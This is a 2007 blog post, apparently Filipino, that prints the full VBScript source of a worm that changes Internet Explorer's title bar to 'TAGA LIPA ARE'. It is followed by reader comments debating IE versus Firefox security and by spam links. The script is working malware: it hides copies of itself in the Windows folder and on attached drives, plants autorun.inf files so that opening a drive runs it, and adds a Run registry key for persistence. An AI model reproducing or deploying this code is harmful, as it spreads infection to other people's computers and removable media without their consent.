Bad Kung Fu

This is the source code for the “worm” that changes your IE’s title bar to “TAGA LIPA ARE”. How many people still use IE anyway?

'THIS IS A MODIFIED VERSION BY: F. E. SILVA
'MABUHAY ANG LIPA
on error resume next
dim mysource,winpath,flashdrive,fs,mf,atr,tf,rg,nt,check,sd
atr = "[autorun]"&vbcrlf&"shellexecute=wscript.exe FS6519.dll.vbs"
set fs = createobject("Scripting.FileSystemObject")
set mf = fs.getfile(Wscript.ScriptFullname)
dim text,size
size = mf.size
check = mf.drive.drivetype
set text=mf.openastextstream(1,-2)
do while not text.atendofstream
mysource=mysource&text.readline
source=mysource & vbcrlf
loop
do
Set winpath = fs.getspecialfolder(0)
set tf = fs.getfile(winpath & "\FS6519.dll.vbs")
tf.attributes = 32
set tf=fs.createtextfile(winpath & "\FS6519.dll.vbs",2,true)
tf.write mysource
tf.close
set tf = fs.getfile(winpath & "\FS6519.dll.vbs")
tf.attributes = 39
for each flashdrive in fs.drives
If (flashdrive.drivetype = 1 or flashdrive.drivetype = 2) and flashdrive.path <> "A:" then
set tf=fs.getfile(flashdrive.path &"\FS6519.dll.vbs")
tf.attributes =32
set tf=fs.createtextfile(flashdrive.path &"\FS6519.dll.vbs",2,true)
tf.write mysource
tf.close
set tf=fs.getfile(flashdrive.path &"\FS6519.dll.vbs")
tf.attributes =39
set tf =fs.getfile(flashdrive.path &"\autorun.inf")
tf.attributes = 32
set tf=fs.createtextfile(flashdrive.path &"\autorun.inf",2,true)
tf.write atr
tf.close
set tf =fs.getfile(flashdrive.path &"\autorun.inf")
tf.attributes=39
end if
next
set rg = createobject("WScript.Shell")
rg.regwrite "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\FS6519",winpath&"\FS6519.dll.vbs"
rg.regwrite "HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Window Title","TAGA LIPA ARE!"
if check <> 1 then
Wscript.sleep 200000
end if
loop while check<>1
set sd = createobject("Wscript.shell")
sd.run winpath&"\explorer.exe /e,/select, "&Wscript.ScriptFullname

Source: PinoyPC

This entry was posted on Wednesday, April 11th, 2007 at 21.30 and is filed under foo, bar and h4xx1ng, Software/Code, Techitude. You can follow any responses to this entry through the RSS 2.0 feed. You can leave a response, or trackback from your own site.

  • http://blog.jupepot.com jupi

    sad to say medyo marami parin gumagamit ng IE lalo na ung mga hinde masyado nagiinternet at di bihasa sa computer. gaya ng tita ko, kuya ni kai, pinsan ko, mga nakikita ko comp shop minsan, atbp. di kasi nila maintindihan mag download download pa, nahahassle ata sila sa ganon, tuturuan mo di gagawin :/, mas gusto nila nandun na wala ng gagawin pa which is IE.

  • http://blog.jploh.com jploh

    So true. Yung cafe nga sa Boracay walang Firefox e. Kaya tuwing uupo ako, kelangan ko pa magdownload. Where’s portable apps when you need it?

  • Anonymous Visitor

    Oh really! As far as I know Microsoft Internet Explorer is far more secured compared to that of Mozilla… Mozilla Firefox’s pop up blocker fails most of the time.

    Just visit his link http://mywebpages.comcast.net/SupportCD/FirefoxMyths.html

  • http://blog.jploh.com jploh

    Haha! Okay. May I suggest rereading this whole page and look for the part wher I said that Firefox is more secure than IE? You’re overreacting.

    On the other hand, it could be true (this post proves how easy it is to write a worm for IE/Windows). Can you write something like this for Firefox? Please, oh please do and prove yourself right.

  • Anonymous Visitor
  • http://blog.jploh.com jploh

    You get to show only two? Not bad for Firefox. I can give you a long list of IE vulnerabilities. If include ActiveX holes, you wouldn’t be able to digest it all. Compare the two pages

    http://secunia.com/product/12434/?task=statistics
    http://secunia.com/product/12366/?task=statistics

    Where’s the worm that I asked you to replicate? Can’t make one?

  • Pingback: iRant » Blog Archive » Taga-Lipa

  • Alexis Pandaan

    What is the source code of Baguio Strawberry virus?

  • http://blog.jploh.com jploh

    If I told you, I’d have to kill you.

  • http://www.cheap-nikeshox.com/nike-shox-TL3.html shox t13men

    Hhe article's content rich variety which make us move for our mood after reading this article. surprise, here you will find what you want! Recently, I found some wedsites which commodity is colorful of fashion. Such as xxxxxxxx that worth you to see. Believe me these websites won’t let ustomemories.com you down.

  • http://www.freehosting-site.com/besthosting/dreamhost-vs-hostgator-v-rdle-dreamhost-and-hostgator-web-hosting-v-rdlus-hostgator-com-vs-dreamhost-com.html bluehost vs dreamhost

    Thanks Bouhammer for the link. Great interview

  • http://www.time-synchronisation.co.uk/the-ntp-server-and-accurate-time Renate Dreben

    I like your site.